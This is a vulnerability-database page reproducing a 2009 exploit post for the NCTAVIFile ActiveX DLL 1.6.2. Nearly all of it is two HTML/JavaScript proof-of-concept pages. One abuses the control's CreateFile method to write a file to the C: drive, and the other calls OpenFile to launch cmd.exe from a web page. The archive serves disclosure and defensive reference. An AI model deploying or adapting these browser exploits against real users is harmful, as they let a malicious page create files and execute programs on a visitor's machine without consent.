Lucene search
K

NCTAVIFile File Creation / Execution

🗓️ 21 Sep 2009 00:00:00Reported by the_Edit0rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

NCTAVIFile File Creation / Execution by the_Edit0r, targeting NCTAVIFile Activex DLL V 1.6.

Code
`"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""  
""" :::::: :: :: :: :: :: :::: """  
""" :: :: :: :: :::::: .. :::: :: """  
""" ::::: ::: ::::: :: :: :: :: :: :::: """  
""" :: :: :: :: : :: :: :: :: :: :: """  
""" :::::: :: :: ::::: :: :::::: :: :: :::: rs.ir """  
""" :: """  
""" """  
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""  
Anti-Security Research Team & Security Institute  
  
#[+] Bug : NCTAVIFile Activex DLL V 1.6.2 Insecure Method File Creation/File execution exploit  
#[+] program Download : http://www.nctsoft.com/  
#[+] Author : the_Edit0r  
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM  
#[+] Greetz to all my friends  
#[+] Tested on: Windows XP Pro SP2 with Internet Explorer 7  
#[+] web site: Expl0iters.ir * Anti-security.ir  
#[+] Big thnx: Aria-Security Team & H4ckcity Member  
  
# Part Expl0it & Bug Codes ( Poc ) :   
------------------------------------  
  
<HTML>  
<b> NCTAVIFile Activex DLL V 1.6.2 Insecure Method File Creation </b>  
  
<BODY>  
<object classid='clsid:6B1E11AC-BF5C-4CF5-9DC9-F81F715EB790' id='expl'></object>  
<SCRIPT>  
  
/*  
targetFile = "C:\WINDOWS\system32\NCTAVIFile.dll"  
prototype = "Sub CreateFile ( ByVal fileName As String )"  
memberName = "CreateFile"  
progid = "NCTAVIFileLib.AVIFileM"  
argCount = 1  
*/  
  
function Boom()  
{  
File = "c:\\system_.ini"  
expl.CreateFile(File)  
}  
</SCRIPT>  
<input language=JavaScript onclick=Boom() type=button value="Click Here For Test Exploit">  
</body>  
</HTML>  
  
---------------------------------------  
  
<HTML>  
<BODY>  
<object id=expl classid="clsid:{6B1E11AC-BF5C-4CF5-9DC9-F81F715EB790}"></object>  
  
<SCRIPT>  
  
function Do_it()  
{  
File = "c:\\windows\\system32\\cmd.exe"  
expl.OpenFile(File)  
}  
  
  
</SCRIPT>  
<input language=JavaScript onclick=Do_it() type=button value="exploit">  
  
</body>  
</HTML>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation